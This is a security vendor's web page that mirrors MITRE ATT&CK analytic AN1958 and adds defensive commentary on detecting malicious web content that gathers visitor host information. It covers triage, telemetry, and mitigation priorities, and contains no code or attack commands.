Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN1958: Analytic 1958

Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.[1][2] Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

EnterpriseAN1958AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

This analytic highlights a difficult pre-compromise detection problem: internet-scale scanning may reveal malicious web content, such as content intended to collect host information from visitors, but the activity can be noisy, common, and often outside the organization’s direct visibility. For leaders, the value is not expecting a clean alert from this analytic alone; it is understanding whether the organization has enough external visibility, threat intelligence context, and incident response linkage to recognize when suspicious infrastructure or watering-hole-style content could become relevant to initial access risk.

Executive priority

Treat this as a visibility and prioritization issue rather than a standalone detection guarantee. Security leaders should ask whether external attack-surface monitoring, threat intelligence review, and SOC escalation paths can connect suspicious web infrastructure findings to business exposure and initial access readiness. Because the ATT&CK description notes high false positives and visibility gaps, budget and audit discussions should focus on evidence quality, triage process, and whether related lifecycle stages are covered.

Technical view

SOC and detection teams should validate how, if at all, they receive evidence from internet scanning, infrastructure research, external threat intelligence, or web-content analysis that identifies patterns associated with malicious content collecting visitor host information. Since no official detection logic is provided and the platform is PRE, teams should avoid treating scanner hits as confirmed malicious activity. Instead, correlate external findings with owned domains, third-party hosted web properties, user reports, web proxy/DNS observations, and any subsequent Initial Access indicators when available.

Likely telemetry

  • External threat intelligence or internet scanning results
  • Web infrastructure and domain intelligence
  • Owned-domain and third-party web asset inventory
  • DNS and web proxy logs where available
  • Web server or content-change monitoring for organization-controlled sites

Detection direction

  • Validate whether findings apply to assets the organization owns, depends on, or exposes to users; otherwise treat them as contextual intelligence.
  • Tune triage to account for the high occurrence and false-positive rate noted by ATT&CK.
  • Correlate scanner-identified suspicious content with related lifecycle evidence, especially potential Initial Access activity, rather than alerting on pattern matches alone.
  • Document visibility gaps where relevant activity occurs outside organizational telemetry.
  • Use external references and threat intelligence context to enrich, not automatically confirm, suspicious infrastructure findings.

Mitigation priorities

  • Maintain an accurate inventory of public-facing and user-facing web assets, including third-party hosted properties where feasible.
  • Prioritize monitoring and change-control evidence for organization-controlled web content that could affect visitors.
  • Ensure SOC and IR playbooks can escalate credible external intelligence into investigation of related access activity.
  • Use threat intelligence and external attack-surface review to prioritize follow-up, while preserving analyst judgment because of expected noise.
  • Review coverage for related Initial Access detections since ATT&CK notes this may be a more practical detection focus.
Analyst notes and limits

The supplied ATT&CK object is a detection analytic, not a technique, and provides no official detection logic, tactics, or relationships. The most defensible use is as a prompt to assess external visibility, threat intelligence triage, and correlation with later-stage evidence.

Coverage cannot be inferred from this object alone. The platform is PRE, no tactics are specified, and ATT&CK explicitly notes high false positives and that activity may occur outside target-organization visibility. Local asset ownership, telemetry availability, and investigation context are required.

Official MITRE ATT&CK definition

Analytic 1958

Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.[1][2] Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
acf150cfcf8a7eb7...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle acf150cfcf8a…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    ThreatConnect Infrastructure Dec 2020

    ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.

    Open source URL
  2. [2]
    ATT ScanBox

    Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.

    Open source URL
  3. [3]
    mitre-attack AN1958
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use